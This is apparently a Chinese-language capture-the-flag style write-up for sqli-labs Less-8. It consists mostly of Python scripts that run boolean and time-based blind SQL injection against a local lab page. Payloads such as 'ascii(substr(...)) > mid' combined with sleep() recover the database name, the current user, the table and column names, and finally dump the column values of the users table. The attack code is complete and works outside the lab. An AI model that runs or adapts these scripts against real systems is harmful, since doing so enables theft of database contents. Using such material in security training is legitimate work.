sqli-labs 第 8 题（Less-8）没有回显，可以尝试用盲注的手法获取数据。测试时发现页面加载了 3 秒左右，因此可以进行（时间）盲注。
布尔盲注数据库名
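import requests


def inject_database(url, *, max_len=14, timeout=10):
    """Recover the current database name from sqli-labs Less-8 with a boolean-based blind injection.

    Less-8 renders "You are in..........." when the injected condition is true and nothing
    otherwise, so each character is found by binary search over
    ``ascii(substr(database(), i, 1)) > mid``.

    Args:
        url: Base URL of the Less-8 page, e.g. ``http://127.0.0.1:8989/Less-8/``.
            Only point this at a lab instance you are authorised to test.
        max_len: Maximum number of characters to extract (the original loop stopped at 14);
            longer names are silently truncated.
        timeout: Per-request timeout in seconds so a stalled server cannot hang the scan.

    Returns:
        The recovered database name.
    """
    dataname = ""
    for i in range(1, max_len + 1):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # The trailing space after "--" is required for MySQL to treat it as a comment.
            payload = "1' and ascii(substr(database(),%d, 1)) > %d-- " % (i, mid)
            # Pass the payload as the `id` parameter so requests URL-encodes it,
            # instead of appending a raw "id=..." query string.
            r = requests.get(url, params={"id": payload}, timeout=timeout)
            if "You are in..........." in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        # ascii('') is 0 in MySQL, so a position past the end converges to 32.
        # A literal space in the name would also stop the extraction here.
        if mid == 32:
            break
        dataname += chr(mid)
        print(dataname)
    return dataname


if __name__ == "__main__":
    url = "http://127.0.0.1:8989/Less-8/"
    inject_database(url)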
结果

用时间盲注获取当前数据库用户名（user()）
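import requests
import time


def inject_user(url, *, max_len=14, delay=1, timeout=10):
    """Recover ``user()`` from sqli-labs Less-8 with a time-based blind injection.

    Each character is binary-searched with
    ``if(ascii(substr(user(), i, 1)) > mid, sleep(delay), 0)``: a response slower
    than ``delay`` seconds means the comparison held.

    Args:
        url: Base URL of the Less-8 page, e.g. ``http://127.0.0.1:8989/Less-8/``.
            Only point this at a lab instance you are authorised to test.
        max_len: Maximum number of characters to extract (the original loop stopped at 14).
        delay: Seconds the injected ``sleep()`` adds; also the detection threshold.
            The measurement includes network latency, so a baseline close to ``delay``
            gives false positives — raise ``delay`` in that case.
        timeout: Per-request timeout; must exceed ``delay`` plus normal latency,
            otherwise a true condition raises ``requests.Timeout``.

    Returns:
        The recovered user string (possibly truncated to ``max_len`` characters).
    """
    user = ""
    for i in range(1, max_len + 1):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # Trailing space after "--" is required for MySQL to treat it as a comment.
            payload = f"1' and if(ascii(substr(user(), {i}, 1)) > {mid},sleep({delay}),0)-- "
            res = {"id": payload}
            # perf_counter is monotonic; time.time() can jump if the wall clock is adjusted.
            start_time = time.perf_counter()
            requests.get(url, params=res, timeout=timeout)
            if (time.perf_counter() - start_time) > delay:
                # The server slept, so ascii(...) > mid was true.
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        # ascii('') is 0 in MySQL, so a position past the end converges to 32
        # (a literal space would also stop the extraction here).
        if mid == 32:
            break
        user += chr(mid)
        print(user)
    return user


if __name__ == "__main__":
    url = "http://127.0.0.1:8989/Less-8/"
    inject_user(url)

# Result section of the write-up: the following modules enumerate tables, columns
# and concrete row data with the same blind-injection technique.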
def main():
    """Run the blind-injection helpers end to end against the local Less-8 lab target."""
    url = "http://127.0.0.1:8989/Less-8/"

    # Step 1: the current database name.
    database_name = inject_database(url)
    print(f"Database name: {database_name}")

    # Step 2: the tables inside that database.
    tables = inject_tables(url, database_name)
    print(f"Tables in database {database_name}: {tables}")

    # Step 3: the columns of one table (hard-coded; replace with the target table).
    table_name = "users"
    columns = inject_columns(url, table_name)
    print(f"Columns in table {table_name}: {columns}")

    # Step 4: the values of one column (hard-coded; replace with the target column).
    column_name = "username"
    data = inject_data(url, table_name, column_name)
    print(f"Data in column {column_name} of table {table_name}: {data}")


if __name__ == "__main__":
    main()
时间检测模块
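def check_time_injection(url, payload, *, delay=1, timeout=10):
    """Send ``payload`` in the ``id`` parameter and report whether the server stalled.

    This is the oracle for the time-based payloads below: they wrap the condition
    in ``if(<cond>, sleep(1), 0)``, so a round trip longer than ``delay`` seconds
    means the condition was true.

    Args:
        url: Base URL of the Less-8 page; only target a lab instance you are authorised to test.
        payload: Value of the ``id`` query parameter (the injection point).
        delay: Seconds the payload's ``sleep()`` adds; must match the payload (default 1).
        timeout: requests timeout so a dead host cannot hang the scan. It must exceed
            ``delay`` plus normal latency, otherwise a true condition raises ``requests.Timeout``.

    Returns:
        True when the request took longer than ``delay`` seconds.

    Note:
        The measurement includes network latency, so a baseline close to ``delay``
        produces false positives; raise ``delay`` and the payload's ``sleep()`` together.
    """
    res = {"id": payload}
    # perf_counter is monotonic; time.time() can jump if the wall clock is adjusted mid-scan.
    start_time = time.perf_counter()
    requests.get(url, params=res, timeout=timeout)
    elapsed_time = time.perf_counter() - start_time
    return elapsed_time > delay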
数据库模块
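def inject_database(url, *, max_len=14, timeout=10):
    """Recover the current database name with a boolean-based blind injection.

    Less-8 renders "You are in..........." for a true condition and nothing otherwise;
    each character is binary-searched over ``ascii(substr(database(), i, 1)) > mid``.

    Args:
        url: Base URL of the Less-8 page; only target a lab instance you are authorised to test.
        max_len: Maximum number of characters to extract (the original loop stopped at 14);
            longer names are silently truncated.
        timeout: Per-request timeout so a stalled server cannot hang the scan.

    Returns:
        The recovered database name.
    """
    dataname = ""
    for i in range(1, max_len + 1):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # Trailing space after "--" is required for MySQL to treat it as a comment.
            payload = "1' and ascii(substr(database(),%d, 1)) > %d-- " % (i, mid)
            res = {"id": payload}
            r = requests.get(url, params=res, timeout=timeout)
            if "You are in..........." in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        # ascii('') is 0 in MySQL, so a position past the end converges to 32
        # (a literal space would also stop the extraction here).
        if mid == 32:
            break
        dataname += chr(mid)
        print(dataname)
    return dataname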
数据库中表名模块
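def inject_tables(url, database_name, *, max_len=20):
    """Enumerate the table names of ``database_name`` with a time-based blind injection.

    Tables are read one at a time from ``information_schema.tables`` via ``limit <index>,1``;
    each character is binary-searched with ``ascii(substr(..., i, 1)) > mid`` through
    ``check_time_injection``.

    Args:
        url: Base URL of the Less-8 page; only target a lab instance you are authorised to test.
        database_name: Schema to enumerate (e.g. the value returned by ``inject_database``).
            It is interpolated into the SQL as a quoted literal; a ``'`` in it breaks the query.
        max_len: Longest table name extracted (default 20, the limit the original comment
            promised — the old ``range(1, 20)`` stopped at 19); longer names are silently truncated.

    Returns:
        Table names in the order ``information_schema`` yields them.
    """
    tables = []
    table_index = 0
    while True:
        table_index += 1
        table_name = ""
        for i in range(1, max_len + 1):
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                # Filter on table_schema: the original compared table_name with the database
                # name, which matches nothing. Trailing space after "--" is required by MySQL.
                payload = (
                    f"1' and if(ascii(substr((select table_name from information_schema.tables "
                    f"where table_schema='{database_name}' limit {table_index-1},1),{i},1)) > {mid},"
                    f"sleep(1),0)-- "
                )
                if check_time_injection(url, payload):
                    low = mid + 1
                else:
                    high = mid
            # ascii('') and ascii(NULL) never exceed mid, so past the end the search converges to 32;
            # a literal space in the name would also stop the extraction here.
            if low == 32:
                break
            table_name += chr(low)
            print(f"Current table name: {table_name}")
        if table_name:
            tables.append(table_name)
            print(f"Found table: {table_name}")
        else:
            # An empty name means `limit` ran past the last row.
            break
    return tables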
列名模块
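def inject_columns(url, table_name, *, database_name=None, max_len=20):
    """Enumerate the column names of ``table_name`` with a time-based blind injection.

    Columns are read one at a time from ``information_schema.columns`` via ``limit <index>,1``;
    each character is binary-searched with ``ascii(substr(..., i, 1)) > mid`` through
    ``check_time_injection``.

    Args:
        url: Base URL of the Less-8 page; only target a lab instance you are authorised to test.
        table_name: Table to enumerate; interpolated into the SQL as a quoted literal.
        database_name: Optional schema filter. Without it (the original behaviour) a table
            name that exists in several schemas (``users`` is common) mixes columns from all of them.
        max_len: Longest column name extracted (default 20; the old ``range(1, 20)`` stopped
            at 19 characters); longer names are silently truncated.

    Returns:
        Column names in the order ``information_schema`` yields them.
    """
    # Adding the schema filter only when requested keeps the default query identical.
    schema_filter = f" and table_schema='{database_name}'" if database_name else ""
    columns = []
    column_index = 0
    while True:
        column_index += 1
        column_name = ""
        for i in range(1, max_len + 1):
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                # Trailing space after "--" is required for MySQL to treat it as a comment.
                payload = (
                    f"1' and if(ascii(substr((select column_name from information_schema.columns "
                    f"where table_name='{table_name}'{schema_filter} limit {column_index-1},1),{i},1)) > {mid},"
                    f"sleep(1),0) -- "
                )
                if check_time_injection(url, payload):
                    low = mid + 1
                else:
                    high = mid
            # ascii('') and ascii(NULL) never exceed mid, so past the end the search converges to 32;
            # a literal space in the name would also stop the extraction here.
            if low == 32:
                break
            column_name += chr(low)
            print(f"Current column name: {column_name}")
        if column_name:
            columns.append(column_name)
            print(f"Found column: {column_name}")
        else:
            # An empty name means `limit` ran past the last row.
            break
    return columns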
指定查询数据模块
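def inject_data(url, table_name, column_name, *, max_len=20):
    """Dump the values of ``column_name`` in ``table_name`` with a time-based blind injection.

    Rows are read one at a time via ``limit <index>,1``; each character is binary-searched
    with ``ascii(substr(..., i, 1)) > mid`` through ``check_time_injection``.

    Args:
        url: Base URL of the Less-8 page; only target a lab instance you are authorised to test.
        table_name: Table to read from; interpolated into the SQL as a raw identifier.
        column_name: Column to read; interpolated into the SQL as a raw identifier.
        max_len: Longest value extracted (default 20; the old ``range(1, 20)`` stopped at 19
            characters). Longer values, e.g. password hashes, are silently truncated.

    Returns:
        The extracted values in row order.

    Note:
        Extraction of a value stops at the first space (ASCII 32), and the row loop stops at
        the first NULL or empty value — both are indistinguishable from "end of data" with
        this oracle, so rows after such a value are not returned.
    """
    data = []
    row_index = 0
    while True:
        row_index += 1
        row_value = ""
        for i in range(1, max_len + 1):
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                # Trailing space after "--" is required for MySQL to treat it as a comment.
                payload = (
                    f"1' and if(ascii(substr((select {column_name} from {table_name} "
                    f"limit {row_index-1},1),{i},1)) > {mid},sleep(1),0) -- "
                )
                if check_time_injection(url, payload):
                    low = mid + 1
                else:
                    high = mid
            # ascii('') and ascii(NULL) never exceed mid, so the search converges to 32 past the end.
            if low == 32:
                break
            row_value += chr(low)
            print(f"Current row value: {row_value}")
        if row_value:
            data.append(row_value)
            print(f"Found data: {row_value}")
        else:
            break
    return data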
结果
数据库 列 user